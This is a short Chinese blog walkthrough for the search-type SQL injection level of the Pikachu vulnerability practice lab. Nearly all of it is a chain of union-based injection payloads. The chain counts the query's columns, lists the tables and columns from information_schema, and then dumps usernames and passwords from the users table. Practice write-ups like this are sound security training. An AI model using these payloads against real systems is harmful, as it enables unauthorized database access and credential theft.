欢迎光临散文网会员登陆 & 注册

Pikachu 漏洞练习平台Sql Injection搜索型注入通关指南pika~pika~

2023-03-09 10:47 作者:Yukito_online 0人读过 | 我要投稿

搜索型有post有get，凭经验自行判断就行

跟上一个get类型的靶场很相似，无非是把查询改成了搜索

一个单引号引发报错。注入点在name

' or 1=1--+

这次在order by4时报错，说明只有三个字段

' order by 4--+

' union select 1,version(),database()--+

' union select 1,2,table_name from information_schema.tables where table_schema='pikachu'--+

' union select 1,2,column_name from information_schema.columns where table_name='users'--+

' union select 1,username,password from users--+

收工，走人

标签：

Pikachu 漏洞练习平台Sql Injection搜索型注入通关指南pika~pika~的评论 (共条)